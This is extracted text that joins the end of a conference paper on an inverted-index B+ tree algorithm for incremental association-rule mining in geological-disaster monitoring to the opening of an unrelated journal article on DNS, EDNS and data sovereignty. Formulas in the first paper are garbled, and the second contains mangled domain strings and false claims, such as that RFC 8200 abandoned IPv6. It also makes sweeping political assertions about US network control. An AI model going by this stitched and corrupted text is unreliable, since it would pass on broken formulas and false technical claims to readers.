of B+ tree and put forward the incremental update association mining algorithm of inverted index tree to deal with the association rules efficiently. A. Basic ideas  Statistics in the database transaction items, get transaction items set.  constructs the inverted index tree (IITree) based on the B+ tree creation method. The bottom-most leaf node of IITree contains all the item sets. The frequent item sets are obtained by comparing the number of items with the minimum support, and other infrequent item sets remain in their leaf nodes to ensure that future data updating become frequent nodes. The different item sets in the frequent item sets are combined and their confidences are calculated. When the confidence is greater than the minimum confidence, the item set combination is the association rule. Compared with the previous incremental updating correlation mining algorithm, Inverted Index Tree Incremental Updating Association mining algorithm introduces B+ tree structure, as well as the database settings. When adding new data, we only need to retrieve the frequent item sets that deal with the new part of the data without the need to re-retrieve the entire database. The algorithm takes advantage of the B+ tree's balanced tree properties. The leaf nodes at the bottom of the tree contain all the keywords of the whole tree, and they are linked together like a doubly linked list. The inverted index[9] is realized based on the B+ tree . B. Set the threshold The minimum support threshold and the minimum confidence threshold will change with different user needs and database updates. When the threshold is set too low, the more rules that are excavated, the lower the usefulness of the rules. Conversely, when the threshold is set too high, there are few rules for mining, so some useful rules will be lost. Therefore, setting the appropriate threshold is very important when dealing with incremental databases.  When mining association rules for the first time, setting the minimum support threshold is a trial and error. Select a small part of data sets randomly from the entire database to be excavated, set initial support thresholds and confidence thresholds according to the user's requirements or experience, and obtain n number of association rules. Compare n with the number of association rules the user expects m. If dnn  ' / , it is considered that the threshold set by the user is smaller, so that the excess number of rules dug up is expected. We should increase the support threshold by a certain value and rerun it. If dnnb  ' / ,it is considered that the user is substantially satisfied with the result of the association rule mined at this support threshold. If bnn  ' / ,it is considered that the set threshold is too large, some important rules may be lost, and then a slightly smaller support threshold is selected to re-excavate the algorithm.  When the transaction database is updated, it is possible that the previously set threshold is no longer applicable, so the threshold needs to be reset. Based on the support threshold, confidence threshold, the number of association rules output by the algorithm at the last time and the current mining targets, the Newton interpolation formula is used to predict the support threshold that should be adopted currently, which makes the mining association rules more effective . 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 49 C. Algorithm implementation In order to achieve the inverted index[11] with the B+ tree, Inverted index tree incremental update association mining algorithm is proposed. 1) The algorithm steps are briefly described as follows: a) Traverse the inverted index map, get the item set. Based on the data of groundwater level, soil moisture content, rainfall and topography in the database of geological disaster monitoring system, inverted index maps were established. Traversing the index graph to get the item set, and then by the B+ tree to build inverted index tree. b) Get all frequent item sets based on the generated IITree. In the B+ tree, the bottom leaf node contains all the keywords. Then, the confidence level is calculated for the combinations of different item sets in frequent item sets, and the correlation rules are obtained, and the correlation analysis of the rules is carried out to obtain a more realistic association rule. c) When the transaction database update records, in accordance with the above steps to retrieve some of the new data processing, the item set inserted IITree. Add a keyword to the leaf node at the bottom of the IITree. If the number of keywords contained in the node does not exceed M, the insertion is successful. Otherwise, the node needs to be split. The number of keywords included in the two new nodes after splitting should not be less than (M/2 + 1). If the parent node of the node has enough space (M/2 ~ M-1), the parent node should contain the smallest keyword in the right node. Otherwise, the parent node is split and a new keyword is added to the parent of the parent node, followed by a higher order until the new root node is generated (1 ~ M-1). d) After the database is updated, repeat the Step2 operation and then generate the association rules. Incremental update is illustrated by groundwater level data. TABLE II is the database updating data, Figure 3 is the entire database corresponding to the II Tree. TABLE II. UPDATE THE RECORD DATA (MM) ID 12 13 Groundwater level 57 41 Figure 3. Inverted index tree of updated data 2) Algorithm flow chart shown in Figure 4: Figure 4. Flow chart of incremental index updating algorithm of inverted index tree mining 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 50 )(*)( )( ),( BPAP BAp BAcorr U  D. Correlation Analysis of Association Rules Although, association rules have metrics of interest such as support and confidence. However, association rules may include causal association as well as random association or even negative correlation. Here's an example to illustrate: In a supermarket database system, the customer's product purchase information is recorded. Of the 10000 purchases, 8000 of them included bread, 6000 had cookies, 4800 had both breads and biscuits. If you set a minimum support of 30% and a minimum confidence of 40%, then can get the following association rules: Rule 1: Buy bread ⇒ Buy biscuits %}60%,48{sup  confidenceport In reality buying bread and buying biscuits may be negative because buying bread will reduce the number of people buying biscuits. At the same time, consider the following negative correlation rules: Rule 2: Buy bread ⇒ Do not buy cookies %}40%,32{sup  confidenceport In a sense, the second rule is more realistic. Thus, under given threshold conditions, two contradictory rules are obtained. It can be seen from the above examples that judging the true meaning of association rules can not be based solely on the measure of support and confidence, but rather on a comprehensive examination of the data set. To do this, put forward some other methods such as chi-square statistics or correlation analysis[12]. The core idea of these methods is to measure the correlation between data items. Chi-square statistics calculation formula is as follows( 2  ): (1) If chi-square statistics is zero, then there is no dependency between the data item A and the data item B, and they are independent of each other. Otherwise, the data items are interdependent. Relevance calculations more clearly show that this dependence is mutual promotion or mutual restraint. Correlation is calculated as follows: (2) If ),( BAcorr is equal to 1, then data item A and data item B are independent; if ),( BAcorr is greater than 1, data item A and data item B are positively correlated; if ),( BAcorr is less than 1, then data item A and data item B are negative Related. Support-Confidence Frame Theory is not perfect: Some rules are of no practical value, even if both support and confidence are high. The association rule BA  does not give the user information whether A and B are constructive or counterproductive. Relevance analysis of association rules is to overcome this deficiency, allowing users to rationally view the association rules. Therefore, after the association rules of the geological disaster monitoring system database are excavated, the correlation analysis should be carried out to ensure the practicability of this rule. If it is determined that the rule is positively correlated, the value of the rule is used as the alarm threshold of the geological hazard monitoring system. In the future of new data acquisition, if the conditions of this rule, then the alarm. People can prevent it in advance. IV. EXPERIMENT RESULTS AND ANALYSIS The algorithm uses the record of rainfall, groundwater level, soil water content and topography data of Shang Nan County in Shang Luo City in the geological disaster monitoring system of last year as the experimental data set. Use C language in Win7, dual-core 2.3GHZ CPU, 4GB memory on the PC for simulation. A. Comparison of IITree algorithm and IUAR algorithm 1) The analysis of time complexity of the algorithm: a) When the data is updated, only in the database to scan the updated data; b) When building an inverted index tree, scan the tree structure once and insert the new item set. Analysis shows that 2 2 )(*)( )]()(*)([ ),( BPAP BAPBPAP BA U  2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 51 when the minimum support is constant, the execution time of the algorithm is related to the amount of data updated each time. To extract a small number of experimental samples from the data set, the minimum support for controlling IUAR algorithm is unchanged (0.1), increase the amount of updated data in turn. Record the experiment time of IUAR algorithm and IITree algorithm respectively, time comparison shown in Figure 5: TABLE III. IUAR, IITREE ALGORITHM TO RUN THE EXPERIMENTAL TIME(S) Data Set Time Twenty thousand IUAR IITree 43 18 forty thousand IUAR IITree 96 33 Eighty thousand IUAR IITree 176 84 One hundred thousand IUAR IITree 402 134 Figure 5. Algorithms time comparison for IUAR and IITree As shown in Figure 5, when the minimum support is constant, the execution time of the IUAR algorithm increases rapidly but the ones of the IITree algorithm grows more slowly when the amount of updated data increases. In the same amount of data, IUAR algorithm takes more time than IITree. 2) The analysis of spatial complexity of the algorithm: a) In the inverted index map, only the updated data is stored, so the size of the memory space is related to the amount of updated data; b) In the IITree algorithm, the frequent item sets determined by the minimum support are stored, so the memory space is associated with the minimum support. This experiment mainly studies the effect of minimum support on memory usage. When the minimum support of IUAR algorithm is changed from 0.2 to 0.6, the data samples and increments remain unchanged. 800 new records have been added to the raw groundwater level data set as test samples. The memory usage of IUAR algorithm and IITree algorithm is compared according to the experimental results. Figure 6. Memory usage comparison Figure 6 shows that the smaller the minimum support, the more the number of item sets produced, the greater the memory footprint. In the case of support change, the IUAR algorithm updates the candidate set with the change of the support degree, saves the candidate item set and the frequent item set in the memory space. The IITree algorithm does not generate the candidate item set in the change of the support degree, so the occupied memory space by IUAR algorithm is greater than the ones by IITree algorithm. B. Application of IITree Algorithm in Geological Disaster Monitoring System If the relationship between the table properties are Boolean attributes, then mining rules from this relational table are Boolean rules. The problem now is that geological disaster monitoring system databases are numerical data. The quantitative attributes must be dealt with in a necessary way so 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 52 that the mining of quantitative rules can be transformed into the mining of Boolean rules. The main strategy is to divide the range of the number attribute into intervals, and to decompose a quantity attribute into several Boolean attributes. In order to reduce the computational workload, the original data are standardized and divided into different sections. The data are grouped according to the sections and the frequency is recorded in the IITree. Then the frequent item sets can be excavated. The frequent item sets are divided according to the average value and divided into low value area and high value area respectively. Data of groundwater level, rainfall, soil moisture content and ground deformation in the past year were selected from the database of geological disasters and the association rules were excavated. Select some of the data for analysis, as shown in TABLE IV: TABLE IV. DISASTER MONITORING DATA TO BOOLEAN DATA CONVERSION TABLE Nu m Ground water level Rainfall Soil moisture content Ground deformation ID L G1 H G2 L R1 H R2 L S1 H S2 S D1 B D2 1 0 1 1 0 0 1 0 1 2 0 1 1 0 1 0 1 0 3 0 1 0 1 0 1 0 1 4 1 0 0 1 1 0 0 1 5 0 1 1 0 0 1 0 1 6 1 0 0 1 1 0 0 1 7 0 1 1 0 0 1 1 0 8 1 0 0 1 1 0 1 0 9 1 0 0 1 0 1 0 1 10 1 0 1 0 1 0 0 1 ... ... ... ... ... ... ... ... ... According to the data of geological hazard monitoring system, the association rule mining is carried out and a series of rules are obtained. Some rules are as follows: Rule 1: If G2=1 and R1=1 and S2=1 then D2=1 Rule 2: If G1=1 and R2=1 and S1=1 then D2=1 Rule 3: If G2=1 and R2=1 and S2=1 then D2=1 Rule 4: If G2=1 and R1=1 and S2=1 then D2=1 Rule 5: If G1=1 and R2=1 and S1=1 then D1=1 Rule 6: If G1=1 and R1=1 and S1=1 then D2=1 After analyzing the above rules, we can get:  In the case of high groundwater tables, heavy rainfall, and high soil moisture levels, large-scale deformation of the ground is promoted (according to rules 1 and 3);  Under conditions of heavy rainfall, the deformation of the ground may also be induced, even if the groundwater level and soil moisture are not high (according to Rule 2);  When the groundwater level and soil moisture content is high, it is possible to promote the occurrence of ground deformation (according to Rule 4);  When the groundwater level is low, the soil moisture content is low and the rainfall is very little, the ground will be deformed due to dryness (according to Rule 6). In summary, when the data of the local water table, rainfall, soil moisture content and ground deformation reach the value of the association rules, further analysis can be used as the warning threshold of landslide or ground fissure. V. CONCLUSION In this paper, An algorithm of Inverted Index Tree Incremental Updating Association Mining (IITree) is proposed. The algorithm is effectively implemented when the database is updated, without having to scan the original database. The new data will be inserted into the original B+ tree to get frequent item sets. Experiment results show that the IITree algorithm consumes less than 2/5 of the IUAR algorithm when the number of transactions and the amount of new data are the same, which improves the efficiency of data processing. When the minimum support of IUAR algorithm changes, IITree algorithm takes up less memory than IUAR algorithm. The application of IITree algorithm to the data analysis of geological disaster monitoring system has some improvements in efficiency and memory usage and can be better applied to the early warning of the system. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 53 REFERENCES [1] Rakesh Agrawal,Tomasz Imieliński,Arun Swami. Mining association rules between sets of items in large databases[J]. ACM SIGMOD Record,1993,22(2). [2] David W.Cheung, Jiawei Han. Maintenance of Discovered Association Rules in Large Databases: An Incremental Updating Technique. In Proc of the Twelfth International Conference on Data Engineering,1996.USA: IEEE, 1996(3):106-114. [3] Zhu Yuquan, Sun Zhizhu, Zhao Chuan Shen.Quickly update frequent itemsets[J].Computer Research and Development,2003(01):94-99. [4] David W L,Cheung S,Lee D,et al.A general incremental technique for maintaining discovered association rules[C].In Proceedings of the Fifth International Conference On Database Systems For Advanced Applications,Melbourne,Australia,1997(3):185-194. [5] FENG Yucai, FENG Jianlin. Incremental Updating Algorithm for Association Rules[J] .Journal of Software, 1998,9 (4): 301. [6] William Cheung, Osmar R.Zaiane. Incremental Mining of Frequent Patterns without Candidate Generation or Support Constraint .In Proc of the Seventh International Conference on Database Engineering and Applications Symposium,2003. USA:IEEE, 2003(7):111-116. [7] Gao Feng, Xie Jianying.Discover the incremental update algorithm of association rules[J].Computer Engineering,2000(12):49-50+112. [8] LI Wen,HONG Qin,TENG Zhongjian,SHI Zhaoying. An inverted index based on B+ tree [J]. Computer Knowledge and Technology, 2011,3 (8): 1720. [9] HU Yanbo,ZHONG Jun. Based on clustering B + tree database index optimization algorithm [J]. Computer Applications, 2013,33 (9): 2474. [10] Roh Hongchan, Kim Woo-Cheol, Kim Seungwoo, et, al. A B-Tree index extension to enhance response time and the life cycle of flash memory[J]. Information Sciences,2009,179:3136. [11] WANG Yingqiang,SHI Yongsheng. Application of B+ Tree in Database Index[J]. Journal of Yangtze University, 2008,3 (5): 233. [12] Chen Xiaojiang, Huang Zhang Chan.Numerical Analysis[M].Beijing: Science Press,2010:30-34. work_7uu52ce5ffbllph3ywz24bap3u ---- DOI: 10.21307/ijanmc-2019-057 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 32 Global Internet Come into a New DNS Era Mou Chengjin Research Center of International Strategic, China Mobile Communication Federation Software Evaluation Center of National Information Center e-mail: Mcjzp139@139.com Abstract—DNS, short for Domain Name System, is an analytic central system, which transfers domain names into IP addresses that can be identified by the Internet. DNS has internal traits within it to conduct commands and regulations in network communication, as well as centralized ones that are inherently political. Unlike other Internet protocols, DNS protocols penetrate the Application Layer, the Internet Layer, the Transport Layer, and provide even more complicated, tailored low-level software that are feasible to the DNS, ranging from authorized Domain Name Servers to Recursive Domain Name Servers, a domain system based Content Distribution Network (DN-CDN), whether private or public, inside or outside the network, it must be dependent on the service provided by Domain Name System (DNS). DNS includes the increase in Client Subnet in DNS Extension Mechanism (EDNS) to conduct more accurate matches to push service. Keyword-DNS; EDNS; SDN; IPv6; TLD I. IMPORTANT LANDMARK EVENTS A. DNS “Execution Day” Knowledge of obsolescent, wrong, or inappropriate methods to conduct software work around is required when we need to go on DNS software updating or programming. Some workarounds pertain to DNS software have made it a deeper and refined situation for the US to control and inaugurate Domain Name System, unavoidably there are functional declination and an increase in unpredictable errors and safety risks. Consequently, reinforcement in Domain Name System becomes inevitable. The Internet Engineering Task Force (IETF) proposed the implementation of DNS Domain Name System Extension Mechanism (EDNS) in 1999. In March 2016, the US Department of Commerce’s National Telecommunications and Information Administration (NTIA), Internet Corporation for Assigned Names and Numbers (ICANN) and VeriSign, a company that provides intelligent information infrastructure services which was established in the United States, led to the completion of the domain name root zone key (KSK) replacement plan as domain name root zone managers. On October 12, 2018, ICANN finished the first global domain name root zone key (KSK) rollover in the history of the Internet and announced there will be rollover every year. Professionals claimed that KSK is a unified “re-keying”, followed by “DNS Execution Day” being unified “lock and hinge updating”, they interlock with each other, laying codes systematically. In May 2018, the Internet’s worldwide regional regulatory agencies (RIR) announced officially that February 1, 2019would be the “DNS Flag Day”. According to the official notifications from regional Internet authorities and the joint alert of the Internet community, non-compliant domain name servers will identified as “Dead” from the “Execution Day” and beyond, which will make inroads on the access of related websites. Domain name servers are mainly authoritative domain name servers and recursive domain name International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 33 servers oriented. Compliance is a “workaround” to dispense with or delete DNS software by updating software version, and to identify or support the Domain Name System Extension Mechanism (EDNS) by Software Defined Interconnection (SDN). EDNS is implemented by the standard RFC 6891 released by the Internet Engineering Task Force (IETF) in 2013. The application of DNS protocols on the Internet has a history of more than 30 years. It is the first time in the history of the Internet of the “Execution Day” to maintain DNS protocols and update DNS software versions together globally, indicating the DNS into a new beginning, a new phase, and a new generation in control community. The Asia Pacific Network Information Center (APNIC) state: “We hope that all operators of authoritative DNSSEC (DNS Security Extension) servers will be able to successfully update their DNS system software and seamlessly transfer to the next 30 years of DNS era.” The London School of Economics and Political Science (LSE) published an article entitled “China and the Domain Name System” in March 2009stating,“In terms of Information and Communication Technology (ICT), DNS is an ‘inherently political’ technology. Because of its ability to allocate, store, and resolve Internet addresses, it is undoubtedly an important fountain of political power; and DNS is mainly for the assurance of the latent capacity to conduct successful communication between standardized technologies and system and the avoidance of duplicate allocation of a same network address. ‘Inherently political’ technologies also characterized by the high concentration of DNS technology itself. Therefore, these who possess the centralized technology of DNS will seize the power and dominance in cyberspace.” B. To dispense with the “next Internet IPNG” The United States has released a series of planned preparations and foreshadows for the implementation of the "next 30-year DNS era", including the deployment of "recognition" for the Internet development. 1) To Abandon IPv6 as “next generation Internet protocols”, this lasts for nearly 20 years On July 14, 2017, the US Internet Engineering Task Force (IETF) released Document RFC 8200, announcing the latest official standard for the sixth edition of the Internet Protocol (IPv6) (Code: STD 86).The Document RFC 2460 (the draft IPv6 specification) proposed in December 1998 and the “Next Generation Internet Protocol IPNG” which was originally for the transition to IPv6 abandoned and removed. The US Internet Regional Working Group pointed out: “In the past few years, the widespread implementation of new data protection regulations around the world is beginning to make inroads on technology companies and consumers worldwide, resulting the change to bad practices of some formerly established best methods required by IETF procedures and regulations.”That is to say, the dramatic changes in the global network application environment have caused dramatic changes in the network technology frames and user needs, “which led to the inevitability and necessity of abolishing drafts (protocols) and transitional measures (plans) with IPv6 in the “next generation of Internet ”, showing that the Document RFC No. 8200 is based not only on the objective summary and generalization of the history and status of the Internet but the adherence to the principle of “US first” and the maintenance of “the supremacy of US interests”, the aim of cyberspace strategy and the security bottom line. In the United States, the transition to IPv6 proposed with a pretext of the "insufficient number of IPv4 addresses"; the “IPv6 draft specification” and “next generation Internet IPNG” transition plan now abandoned based on the same principles. The reason being not simply in the design of network technology architecture; nor in the strategic error of network International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 34 deployment, but a major deployment to deepen and refine the US network hegemony, and a fundamental decision to reaffirm the “inherently political” trait of the Internet. Correspondingly, the KSK and DNS Domain Name System Extension Mechanism (EDNS), which controls the DNS Domain Name System Security Extension (DNSSEC), are the premise and the foundation for establishing and consolidating the core role and status of DNS in the "next generation Internet ". 2) The release of three basic principles advocated by IETF intellectual property rights In May 2017, the US Internet Engineering Task Force (IETF) issued the official document RFC8179 (BCP79), the “Intellectual Property Rights in IETF Technology”, providing three basic principles in handling Internet intellectual property problems and discarding document RFC3979 and RFC4879. TheRFC8179 document stipulates: a) The IETF will make no determination about the validity of any particular IPR claim. b) The IETF, following normal processes, can decide to use technology for which IPR disclosures been made if it decides that such a use is warranted. c) In order for a working group and the rest of the IETF have the information needed to make an informed decision about the use of particular technology. All those contributing to the working group’s discussions must disclose the existence of any IPR the Contributor or any other IETF Participant believes Covers or may ultimately cover the technology under discussion. This applies to both Contributors and other Participants, and applies whether they contribute in person, via email, or by other means. The requirement applies to all IPR of the Participant, the Participant’s employer, sponsor, or others represented by the Participant that reasonably and personally known to the Participant. No patent search is required. That is to say, “The Internet is mine, and the rules are made by me.” IETF is legitimate to choose technology that has not intellectual property rights claimed yet, or freely licensed intellectual property technology; IETF can adopt any technology with no promise of any technology license. Indicating that technology adopted by the IETF in Internet engineering applications is free from the restriction of intellectual property rights and ownership owners. It only determined by the IETF whether the technology adopted by the Internet is “compliant”; technology and any application of intellectual property rights are invalid and non-compliant without the consent of the IETF, and the IETF will not admit it. It is commonplace for the IETF to enforce the utterance of security technology in its technical specifications. The release of the three principles of intellectual property rights is only a public announcement of the “removing the burning brands from under the boiling cauldron”, “overweening” and “getting my own way” strategies. Until November 2018, the US Patent and Trademark Office (USPTO) granted 19,296 patents for IPv6 related technologies, and the European Patent Office (EPO) granted 2,180. The abrogation of IETF for IPv6 as the "Next Generation Internet Protocol" and its decision to implement a global “DNS Execution Day” and the practice of arbitrarily shutting down the best servers of other countries (such as Iraq and Libya, disconnecting the network and services. No matter how powerful the intellectual property rights are, no matter who grants intellectual property rights to them and who's intellectual property rights are, the three principles of intellectual property rights of IETF, the US civil society organization, are placed on the authority of the government to protect intellectual property rights and the authority of the regulatory agencies. They are absolute dominate and the only "compliance" to the Internet. The principle of “US priority” and “US interest first” and the bottom line always placed beyond International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 35 everything else, too is the cyberspace hegemony to maintain the Internet “one network for all” policy. II. LEGAL COMPETITION FOR DATA SOVEREIGNTY The three basic dimensions that make up cyberspace are the infrastructure-centered physical dimension, the data-centric information dimension, and the cognitive dimension centered on human behavior. For more than half a century, irreversible evolution have taken place, from industrialization to socialization, from commercialization to customization, and the quality-quantity evolution from technology-driven to data-driven, especially the dominance and influence of marginal politic power have become increasingly prominent. The United Nations Internet Governance (IGF) organization has approved the Global Internet and Jurisdiction Policy Network (I&J) as an “open forum” with more than 200 key entities from different stakeholders around the world participated, including governments and networks enterprises, technical groups, civil organizations, academic institutions and international institutions (for some reason, no Chinese organization participated), with the focus of research and discussion being “the jurisdiction of data” for three consecutive I & J annual meetings (including the upcoming annual meeting in June 2019) . In October 2015, the European Court of Justice (ECJ) made a landmark ruling that overturned the “safe harbor “mechanism proposed by the European Commission at the beginning of this century and has utilized by more than 4,000 companies, including IBM, Google and Ericsson. According to the European Court of Justice, the "safe harbor" mechanism does not provide adequate protection for the personal data of EU citizens, because the United States often violates the privacy protection measures established by the mechanism in the name of national security, public interest and law enforcement needs. UK is the one with the highest penetration rate of the Internet economy in the G20 countries. The goal of the UK government is to make UK the safest country to conduct online business activities, and the government holds that the level and duration of protection for personal data should be improve simultaneously when the amount of personal data is keeping increased by the development of digital economy. On August 7, 2017, the UK Department of Digital, Cultural Media and Sports issued a report titled “New Data Protection Act: Our Reforms”, which passed the new Data Protection Law to update and enforce the personal data protection in the digital economy era and to replace the 1998 Data Protection Act. The General Data Protection Regulations (GDPR) adopted by the European Parliament came into effect on May 25, 2018. The regulation extends the data protection from subordinates to owners, refines the classification of personal private data, clarifies the “consent” requirements of the data subject, and guarantees the individual’s access to the data, the right to restrict processing and the right to refuse data using, and “portable rights" (obtaining a copy of personal data processing), "erasing rights" (also known as the right to be forgotten). Severe high-limit penalties have been imposed for data managers and processors who violate the law to negate data owner rights, to restrict data processing, to interrupt data transmission or to prohibit data access. Trump is in a tit for tat, and signed the Clarify Lawful Overseas Use of Data (CLOUD) on March 23, 2018; two months in advance of the European Union, requiring the US Federal Bureau of Investigation (FBI) and other law enforcement agencies have the right to get access to Internet data worldwide. The bill holds that timely access to electronic data provided by communication service providers is the key to the US governments for protecting public safety and combating major crimes, including terrorism; the International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 36 communication service providers that regulate, control or own such data should subject to the US law. The bill also allows other countries to store personal data of non-US citizens in the United States. According to professionals, the bill gives US law enforcement agencies infinite priority for administrating any data controlled by the service provider, regardless of where the data is stored and where it created. In other words, the Clarify Lawful Overseas Use of Data holds that the US government, USA companies and institutions are legal and legitimate in accessing any data in the world to be prosecuted and punished against the EU General Data Protection Regulations. . The year 2018, it called the “first world data protection year”. Undoubtedly, the protection of data sovereignty and security has risen to the battle for national sovereignty and security. What we have seen is still the battle for cyberspace data that dominated by “US priority”, “US interest first”. “DNS Execution Day” indicates that the cyberspace data battle has penetrated into the control and command system of the Internet in all directions. Nomine, one of the world's three largest network information centers, is one of the world's first professional CCTLD (Country Code Top Level Domain) operators. The UK’s .UK domain name management and registration agency founded in May 1996. Nomine believes that DNS plays a vital role in every network – it sets the technical standard for translating human-readable domain names into machine-aware Internet Protocol (IP) addresses. In other words, DNS is the underlying backbone platform of network data operations, applications, services, and security. The dispute between data sovereignty and security must first involve the dispute over the control, command, standard, and initiative and discourse power of the DNS. The “DNS Execution Day” is the inevitable result of data sovereignty competition. The United States yields none in cyberspace data, not only in technology but also in the performance and implementation at the legal level. III. CHINA'S NETWORK DATA HAS MAJOR SECURITY RISKS A. Servers generally hosted outside the country When observing reversely, China is obviously lagging behind in maintaining data sovereignty and security, protecting data, paying attention to and using data. In the form of insufficient emphasis on law, owner management, and governance of data, many institutions and officials who rely on data and contact with data all day are ignorant of the principles, bottom lines, key points, methods, and approaches of data protection. They are politically confused; formality adhered, technically exaggerated, and lazy in management. According to National Information Center’s continuous real-time monitoring based on DNS open source information, there is a top-down tendency in China’s party and government organs, state-owned enterprises, well-known websites (service providers) and other servers with their servers indirectly or directly hosted outside the country. In recent years, there is a large number of data leakages in citizens' personal data, corporate data, national data, and other data involving important economic, political, social, cultural, military and other sensitive industries. Some enterprises provide exclusive services of domestic servers hosting to overseas, and Content Delivery Network (CDN) services, without any scruples and hesitation. In 2017, China ranked first in the top 10 countries of data leaking. The main member including Baidu with 2 billion user phone numbers, names and addresses; Notecase’s 1.222 billion email addresses and user passwords sold on the Internet; Shanghai Chonju’s 268 million email addresses and phone numbers; Ten cent’s 130 million Email address and International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 37 user password sold on the network and the like. So far, how do did they reflect and rectify, and how did the government regulatory department investigate and handle with they remain unknown. However, the online articles that disclosed the truth of the leaked data were quickly delete, and the websites that published the articles were under great pressure. Not only are the rights of the individuals and units that have leaked data at least not respected and protected, but the national data security issue is actually “turned to domestic sales” after being discovered and alerted by the outside world. It is really a strange thing. On October 11, 2018, Wiki Leaks published Amazon’s “highly confidential” internal file "Amazon Atlas." The document lists the address and operational details of more than 100 Amazon data centers in 15 cities across nine countries, among them nine data centers are in China with six in Beijing. In 2013, Amazon signed a contract with the US Central Intelligence Agency (CIA) to build a “cloud” for intelligence agencies to integrate and provide information classified as “top secret”. Amazon also operates a special Gov Cloud area (government cloud) for the US government. Amazon's government cloud center in China is located in Ningxia Province. Many local development zones and high-tech zones have numbly invited Amazon to set up data centers in the region to publicize and provide “business” training for free servers hosting. On November 20, 2017, Amazon publicly announced that it would provide a "cloud" service to the CIA and its intelligence system (IC) members, known as the "Amazon Secret Service" (AWS Secret Region). Amazon called the service “the first and the only commercial cloud providing the government with a comprehensive data classification service, including non-confidential, sensitive, confidential, top secret data”. Amazon is the only company required to certify confidential data in the "cloud". The Net Ease mail server hosted on Amazon's AWS service platform. The server is hosted outside the country, on Amazon,, meaning that the path and system relying on the DNS domain name address translation and resolution depend ocean penetrate (leap) China's “firewall”, with no need to go through the “mirror” in China (With no traces left).It avoid the various monitoring and supervision in China, and the big data managed by the host can be selectively filtered and then “pushed” back to the “Cloud” operated b China. B. Revolving Doors Abound In the early years, some college elites in the United States changed their status and became national politicians. Some senior generals retired as multinational entrepreneurs or scientific research leaders. They considered the "revolving doors" of identity conversion, which provided the possibility for the realization of the American dream. Over the years, the concept and manipulation of the "revolving door" has applied to the Internet. Based on the situational awareness of DNS real-time monitoring, the “revolving door” problem found in the servers and “cloud” centers of publicly known websites. The “vest effect” led by the domestic company and jointly produces the data flow to the outside is called the "inner revolving door", otherwise it is called the "outer revolving door". The original source data conducted in China hosted overseas, and the data pushed from overseas is the data being filtered (backup), and cached domestic. Data leakage or malicious utilization are only in the moment of "revolving door", and we are often asking and arguing for whether the data is leaked, how much data leaked, "towing the library" or "collision library"..... Please note that in recent years, the US Department of Justice, the Federal Bureau of Investigation, and other public evidences of criminal prosecution of Chinese citizens (including my national security officials, international students, researchers, entrepreneurs and the like) are mainly obtain through International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 38 the "revolving door"-- Open source data, information, and intelligence. The CDN Cache Server is an important technical model supporting “revolving doors”. It is the source to provide data (content) to the territory, and also the node that receives data (content) from outside the country. Its open custom port potentially interacts with other countries. Network intrusions and attacks often utilize custom port penetration. Among Ten cent’s 16 mail servers (IPv4 addresses), 12 of them belong to Los Angeles, with an autonomous system AS 7939, the owner being owner Hurricane Electric (HE, Hurricane Electronics); and the rest 4 in Shenzhen, with an autonomous system AS 132203/132591, with the owner being Ten cent itself. All servers have a "revolving door" function. Apple has four major domain names in China. The “Guizhou-Cloud Big Data” page is www.colasoft.com.cnicloud.com.cn, and the other three addresses displayed on Apple's official website. The "Canonical Name" of “Guizhou-Cloud Big Data” is www.icloud.com.cn.edgekey.net, the website in China is 47.96.193.19 (www.icloud.com.cn), and the owner is AS37963 (Alibaba Cloud). The IPv4 address 104.100.56.123 mapped to the IPv4 address 23.38.201.117, and the owner is Akamai Corporation of the United States (a service provider with more than one-third of the CDN market in the world). The function of “Guizhou-Cloud Big Data” and the “revolving door” is very obvious and typical, and may involve deeper and broader cyberspace sovereignty and security issues. The alias of China Railway 12306’s main website is www.12306.cn.lxdns.com, the website in China is 58.216.109.187, the owner is AS4134 (China Telecom), and the five DNSs bound to the alias are all in the United States (AS54994).It is a typical DNS-based content push network (DN-CDN); the domain name of the customer service center dynamic.12306.cn is hosted by the host’s IP address 210.61.207.156 (AS3462), the territory is actually Taiwan (Taipei) and the owner is incredibly the official network operator of Taiwan, Data Communication Business Group. TABLE I. SOME OF CHINA RAILWAY’S SUB DOMAIN HOSTED IN TAIWAN [210.61.207.156] Sub-domain name (alias) Standardize domain name IP address visible in the territory (A record) Business (reference) dynamic.12306.cn dynamic.12306.cn.lxdns.com 110.18.246.12 customer service ad.12306.cn ad.12306.cn.wscdns.com 110.18.246.12 advertisement travel.12306.cn travel.12306.cn.wsglb0.com 110.18.246.12 go out hotel.12306.cn hotel.12306.cn.wsglb0.com 110.18.246.12 hotel wifi.12306.cn wifi.12306.cn.wsglb0.com 110.18.246.12 Radio communication test.wifi.12306.cn test.wifi.12306.cn.wscdns.com 110.18.246.12 test eximages.12306.cn eximages.12306.cn.wsglb0.com 110.18.246.12 picture epay.12306.cn epay.12306.cn.lxdns.com 110.18.246.12 electronic payment expay.12306.cn expay.12306.cn.wsglb0.com 110.18.246.12 epay-hy.12306.cn epay-hy.12306.cn.lxdns.com 110.18.246.12 exservice.12306.cn exservice.12306.cn.wsglb0.com 110.18.246.12 hyfw.12306.cn hyfw.12306.cn.lxdns.com 110.18.246.12 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 39 China Railways Member Service’s domain name cx.12306.cn managed by the host’s IP address 163.171.129.134 (AS 54994), belonging to the United States (California), and the owner is QUANTIL NETWORKS. TABLE II. SOME OF CHINA RAILWAY’S SUB DOMAIN HOSTED IN TAIWAN [163.171.129.134] Sub-domain name (alias) Standardize domain name IP address visible in the territory (A record) Business (reference) cx.12306.cn cx.12306.cn.wsglb0.com 110.18.246.11 Member Services video.12306.cn video.12306.cn.lxdns.com 110.18.246.11 video The above-mentioned hosting servers had opened and used the “Tor the onion router” port 81 defined by the Internet Assigned Numbers Authority (IANA) specification. "Onion routing" is an anonymity-orient, self-contained domain name system and proxy mechanism, mostly used for "dark net" and hackers. Using 